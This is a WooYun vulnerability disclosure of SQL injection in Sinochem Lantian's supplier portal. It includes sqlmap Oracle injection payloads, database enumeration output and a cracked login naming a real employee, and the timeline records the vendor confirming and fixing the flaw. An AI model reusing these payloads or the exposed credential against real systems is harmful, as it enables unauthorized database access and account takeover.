当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152917

漏洞标题:中化蓝天集团供应商系统SQL注入(dba权限/已登录)

相关厂商:sinochemlt.com

漏洞作者: Ysql404

提交时间:2015-11-12 00:50

修复时间:2015-12-17 13:31

公开时间:2015-12-17 13:31

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-12: 细节已通知厂商并且等待厂商处理中
2015-11-12: 厂商已经确认,细节仅向厂商公开
2015-11-22: 细节向核心白帽子及相关领域专家公开
2015-12-02: 细节向普通白帽子公开
2015-12-12: 细节向实习白帽子公开
2015-12-17: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

中化蓝天集团供应商系统SQL注入(dba权限/已登录)

详细说明:

中化蓝天供应商门户SQL注入
注入点:http://**.**.**.**:801/OutPortal/OutPortalDetailView?messageid=86

QQ图片20151108173352.jpg


oracle管理员权限

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: messageid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: messageid=86 AND 7119=7119
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: messageid=86 AND 9123=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(108)||CHR(104)||CHR(122)||CHR(113)||(SELECT (CASE WHEN (9123=9123) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(106)||CHR(108)||CHR(104)||CHR(113))
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind (heavy query)
    Payload: messageid=86 AND 4279=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)
---
[17:26:57] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Oracle
[17:26:57] [INFO] fetching current user
[17:26:57] [INFO] retrieved: SRM
current user:    'SRM'
[17:26:57] [INFO] fetching current database
[17:26:57] [INFO] resumed: SRM
[17:26:57] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'SRM'
[17:26:57] [INFO] testing if current user is DBA
current user is DBA:    True
[17:26:58] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[17:26:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'


数据库信息

available databases [20]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] INTERFACELIBRARY
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SRM
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB


当前数据库中的数据表

Database: SRM
[280 tables]
+------------------------------+
| PARAMETER                    |
| A123                         |
| AAGONGYINGFENLEI01           |
| AAJIANGJI01                  |
| AAJIANGJI02                  |
| ACCOUNTPAYMENT               |
| ACTIONLOG                    |
| APPVENDORADMITTANCE          |
| APPVENDORADMITTANCEPARM      |
| APPVENDORITEMHEAD            |
| ASN                          |
| ASNDETAIL                    |
| ASNPRINTLOG                  |
| BAK_ORDERDETAILL0923         |
| BALANCEPAYMENT               |
| BIDACTUALEVALMODELEXPERT     |
| BIDACTUALEVALMODELRULE       |
| BIDCASEEVAL                  |
| BIDCASEEVALRESULT            |
| BIDCHECKMESSAGE              |
| BIDDER                       |
| BIDDERBIDLOG                 |
| BIDDERCONFIRMLOG             |
| BIDDERPRICE                  |
| BIDEVALMODELEXPERT           |
| BIDEVALMODELH                |
| BIDEVALMODELRULE             |
| BIDEXPERTGROUP               |
| BIDEXPERTGROUPMEMBER         |
| BIDHEAD                      |
| BIDLOG                       |
| BIDMESSAGE                   |
| BIDNOTICE                    |
| BIDOBJECTS                   |
| BIDPARAMETER                 |
| BIDPRICE                     |
| BIDTIMELINE                  |
| BILL_STREAM                  |
| CALENDARDETAIL               |
| CALENDARHEADER               |
| CATEGORY                     |
| CERTFORM                     |
| CERTFORM2ITEMGROUP           |
| CERTFORMFLOW                 |
| CERTFORMFLOWTASK             |
| CERTFORMFLOWVISITD           |
| CERTFORMFLOWVISITM           |
| CERTFORMREPORT               |
| CERTIFICATEMATERIAL          |
| CERTIFICATETYPE              |
| CERTSAMPLENOTICE             |
| CERTSAMPLENOTICEDT           |
| CERTTASKTAMPLATE             |
| CERTTEMPLATE                 |
| CERTTESTRUN                  |
| CERTTESTRUNCHECK             |
| CERTTESTRUNCHECKDT           |
| CERTTESTRUNDT                |
| CERTVENDORQUALITYFEEDBACK    |
| CERTVENDORQUALITYIMPROVE     |
| CERTVENDORQUALITYIMPROVEDT   |
| CERTVENDORQUALITYIMPROVEITEM |
| CERTVISITTEMPLATED           |
| CERTVISITTEMPLATEM           |
| CHANGEVENDOR                 |
| CHECKBILL                    |
| CHECKBILL20150717            |
| CHECKBILL_20150710           |
| CHECKBILL_20150714           |
| CHECKBILL_20150715           |
| COMPANY                      |
| COMPANY2ITEM                 |
| COMPANY2USER                 |
| COMPANY2VENDOR               |
| COMPANYBILLCODE              |
| COMPAREBILLCURRENTPRICE      |
| COMPAREBILLDETAILS           |
| COMPAREBILLMASTER            |
| COMPARISONPRICE              |
| CONSIGNMENINV                |
| CONTRACT                     |
| CONTRACTITEM                 |
| CONTRACTITEMQUALITY          |
| CONTRACTITEMQUALITY20150722  |
| CONTRACTLITEM                |
| CONTRACTSUBJECT              |
| CONTRACTTEMPLATE             |
| CONTRACTTEMPLITEM            |
| CONTRACTTEMPMITEM            |
| CONTROLLERACTION             |
| COSTANALYSISTMP              |
| COSTANALYSISTMPDIRECT        |
| COSTANALYSISTMPFEESEXPLAIN   |
| DELIVERYPLAN                 |
| DELIVERYPLANHISTORY          |
| DEPARTMENTUSER               |
| DZ                           |
| FLOWER_ROUTE                 |
| FM_FORM_APPROVE              |
| FUNC                         |
| FUNCUG2CONTROLLERACTION      |
| FUNCUG2FUNC                  |
| FUNCUG2USER                  |
| FUNCUSERGROUP                |
| FUNC_BACK20150519            |
| FUNC_TEMP                    |
| GT$PERFCHECKREPORT           |
| GT$PERFCHECKRESULT           |
| INQUIRYITEM                  |
| INQUIRYPRICE                 |
| INQUIRYVENDOR                |
| INSTRUCTION                  |
| ITEM                         |
| ITEMQUALITYINDEX             |
| ITEMQUALITYINDEX20150722     |
| ITEMQUALITYSDETAIL           |
| ITEMQUALITYSTANDARD          |
| ITEMSOURCE                   |
| ITEMTYPE                     |
| ITEMTYPESOURCE               |
| LITEMMAPPING                 |
| LOGINLOG                     |
| LZJ                          |
| LZJ1                         |
| LZJASN                       |
| LZJBJ                        |
| LZJDZ                        |
| LZJITEM                      |
| LZJ_JG                       |
| LZJ_VENDOR                   |
| MAORDERTAIL0619              |
| MAORDERTAIL0619Q             |
| MRDEMANDSCHEDULE             |
| ORDERDETAIL                  |
| ORDERLOG                     |
| ORDERMESSAGE                 |
| ORGANIZATION                 |
| PERFCHECK                    |
| PERFCHECKBATCH               |
| PERFCHECKDATAGATHER          |
| PERFCHECKMEMBER              |
| PERFCHECKNORMAL              |
| PERFCHECKORG                 |
| PERFCHECKORG2PLANT           |
| PERFCHECKREPORT              |
| PERFCHECKRESULT              |
| PERFCHECKTARGET              |
| PERFDETAILTARGET             |
| PERFGROUP                    |
| PERFGROUP2DTARGET            |
| PERFGROUP2NTARGET            |
| PERFGROUP2USER               |
| PERFGROUP2VENDOR             |
| PERFITEMCHECKGROUP           |
| PERFITEMCHECKGROUP2ITEM      |
| PERFITEMCHECKGROUP2USER      |
| PERFLEVEL                    |
| PERFLEVELTEMPLATE            |
| PERFNORMALCHECK              |
| PERFNORMALTARGET             |
| PERFPRODUCTINCOMEPASSRATE    |
| PERFTEMPLATE                 |
| PERFTEMPLATEDITEM            |
| PERFTEMPLATEDNORMAL          |
| PERFTEMPLATEDOPTION          |
| PERFTEMPLATEMITEM            |
| PERFTEMPLATESCOREINTERVAL    |
| PERFTEMPLATEVENDOR           |
| PERFUPLOADCREDITDAYS         |
| PERFUPLOADPRODUCTPASSRATE    |
| PERFUPLOADPURCHASEPLAN       |
| PLANT                        |
| PLANT2ITEM                   |
| PLANT2USER                   |
| PLANTITEM2VENDOR             |
| PORTALMESSAGE                |
| PORTALMESSAGETO              |
| PORTALNOTICE                 |
| PORTALNOTICEVIEWLOG          |
| PREVENDORCERTIFICATE         |
| PREVENDORDTTEMP              |
| PREVENDORLOG                 |
| PREVENDORTEMP                |
| PURCHASEORG                  |
| PURCHASEORG2ITEM             |
| PURCHASEORG2ITEMLOG          |
| PURCHASEORG2PLANT            |
| PURCHASEORG2USER             |
| PURCHASEORG2VENDOR           |
| PURCHASEORGUSERVENDOR        |
| PURCHASEREPORT               |
| PURCHORDER                   |
| PURCHORDER_20150805          |
| PURCHUG2USER                 |
| PURCHUSERGROUP               |
| QCREPORT                     |
| QCREPORTITEM                 |
| QUALITYINDEX                 |
| QUALITYINDEX20150722         |
| QUOTA                        |
| QUOTADETAIL                  |
| QUOTEDCHECKPRICE             |
| QUOTEDPRICE                  |
| QUOTEDVENDOR                 |
| REPORT10                     |
| REPORT11                     |
| REPORT12                     |
| REPORT2                      |
| REPORT3                      |
| REPORT4                      |
| REPORT5                      |
| REPORT6                      |
| REPORT7                      |
| REPORT8                      |
| REPORT9                      |
| SIGNVENDORSTATE              |
| SORQUODETAILNORMAL           |
| SORQUOTATION                 |
| SORRFQ                       |
| SORRFQ2NORMALITEM            |
| SORRFQ2VENDOR                |
| SRMFLOWERFORM                |
| SRMFLOWERLOG                 |
| SRMMAIL                      |
| SRMMAIL_RECEIVERS            |
| SRMORFLOWERSIGN              |
| SRMRULE                      |
| STOCKIN                      |
| STOCKIN_1                    |
| SUBMENUDETAIL                |
| SYSUSER                      |
| SYSUSERTEMP                  |
| TBLRPTVCONNECT               |
| TBLRPTVDATAFMT               |
| TBLRPTVDATASRC               |
| TBLRPTVDATASRCCOLUMN         |
| TBLRPTVDESIGNMAIN            |
| TBLRPTVENTRY                 |
| TBLRPTVFILTERUI              |
| TBLRPTVGRIDCOLUMN            |
| TBLRPTVGRIDDATAFMT           |
| TBLRPTVGRIDDATASTYLE         |
| TBLRPTVGRIDFLT               |
| TBLRPTVGRIDMAIN              |
| TBLRPTVMDL                   |
| TBLRPTVMENU                  |
| TBLRPTVRPTSECURITY           |
| TBLRPTVSTYLE                 |
| TBLRPTVSTYLEDTL              |
| TBLRPTVSYSERROR              |
| TBL_SYSTEM_LANGUAGE          |
| TEMDATA                      |
| TEMDATA2                     |
| TEMP1                        |
| UPLOADFILES                  |
| VENDOR                       |
| VENDOR20150722               |
| VENDOR20150803               |
| VENDOR20150803JJ             |
| VENDOR20150804               |
| VENDOR20150806               |
| VENDOR2USER                  |
| VENDORBANK                   |
| VENDORBANKTEMP               |
| VENDORCERTIFICATE            |
| VENDORCERTIFICATETEMP        |
| VENDORCONTACT                |
| VENDORCREDIT                 |
| VENDORIMPROVE                |
| VENDORITEMHEAD               |
| VENDORITEMHEADVISION         |
| VENDORITEMPARAM              |
| VENDORITEMPARAMVISION        |
| VENDORITEMPRICE              |
| VENDORITEMPRICEHIS           |
| VENDORITEMVISION             |
| VENDORTYPE                   |
| VENDORTYPEDETAIL             |
| VENDOR_1                     |
| ZY                           |
+------------------------------+


sysuser表中的部分数据

Database: SRM
Table: SYSUSER
[9181 entries]


mask 区域


*****-----------+----------------+-----------+-----------+-----------+------------+------------+--*****
*****           | USERPHONE      | ADDITION1 | ADDITION2 | USERALIAS | USERSTATUS | USERANSWER | C*****
*****-----------+----------------+-----------+-----------+-----------+------------+------------+--*****
***** trimmed to last 256 r*****
*****                           | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL*****
*****                     | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL     *****
*****                           | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL*****
*****                         | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL  *****
*****                         | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL *****
*****                       | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL   *****
*****                     | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL     *****
*****                           | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL *****
*****                           | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL*****
*****                     | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL     *****
*****                             | NULL           | NULL      | NULL      | NULL      | Invalid    | NUL*****
*****                         | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL *****
*****                             | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL*****
*****                     | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL    *****
*****                           | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL *****
*****                       | NULL           | NULL      | NULL      | NULL      | Invalid    | NULL  *****

漏洞证明:

QQ图片20151109072800.png


QQ图片20151109072845.png


md5解密后可以登录系统,登录用户名及密码:尹海飞/000000

QQ图片20151109073104.jpg


QQ图片20151109073233.jpg


QQ图片20151109074213.png


QQ图片20151109074244.png

修复方案:

过滤

版权声明:转载请注明来源 Ysql404@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-11-12 08:37

厂商回复:

可导致客户信息、重要业务数据泄露,非常严重。我们尽快修复。

最新状态:

2015-11-20:@路人甲 系统供应商已修复注入漏洞,能否帮忙确认?

2015-11-26:@乌云 漏洞已修复,可以公开。但能否隐藏人员姓名、手机、邮箱、供应商名称、合同金额?这些都是商业敏感信息。

2015-12-17:已修复。